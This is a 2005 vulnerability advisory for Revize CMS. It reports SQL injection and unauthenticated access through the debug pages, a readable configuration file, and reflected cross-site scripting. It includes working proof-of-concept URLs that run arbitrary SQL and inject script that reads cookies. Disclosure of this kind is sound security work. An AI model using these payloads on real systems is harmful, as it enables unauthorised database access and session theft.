 #######################################################
Revize(r) CMS SQL information disclosure and XSS
Vendor url:http://www.idetix.com
Advisore:http://lostmon.blogspot.com/2005/11/
revizer-cms-sql-information-disclosure.html
Vendor notify: exploit available:yes
#######################################################

The Revize(r) Web Content Management System enables
non-technical content contributors to quickly and easily
keep their Web Pages up-to-date. Revize can be applied
to a sophisticated, mature site or to the development of
a new Web Site from the ground up. And Revize is powerful
enough to manage Web content for any large organization.
Or, Revize can be localized into one or more departments.

The Input passed to the "query" parameter in "query_results.jsp"
isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

This may allow a remote attacker execute or manipulate SQL
queries in the backend database.

a remote user can obtain sensitive data , about the target
system if the attacker request directly ' revize.xml '
located in ' conf ' directory...the normal url for this flaw is:
http://[victim]/revize/conf/

#################
version
#################

unknow version of Revize(r) CMS

##################
solution
##################

No solution at this time.

###################
Timeline
###################

Discovered: 02-11-2005
vendor notify:14-11-2005
vendor response:
disclosure:16-11-2005

#######################
examples
#######################

SQL command:

http://[Victim]/revize/debug/query_results.jsp?
webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_results.jsp?query=
select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_input.jsp?
table=rSubjects&apptable&webspace=REVIZE

¿Admin Bypass ?

http://[Victim]/revize/debug/

wen we are in this url , the page have a login form for
accessing, but if we click in any link we can obtain some
relevant information about the site and we don´t need a login.


http://[Victim]/revize/debug/apptables.html
http://[Victim]/revize/debug/main.html

#####################
cross site scripting
#####################

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap
=subject&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=security
&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&action=login&resourcetype=security&objectmap
=subject&error=admincenter/login.jsp


################### €nd ############################

thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....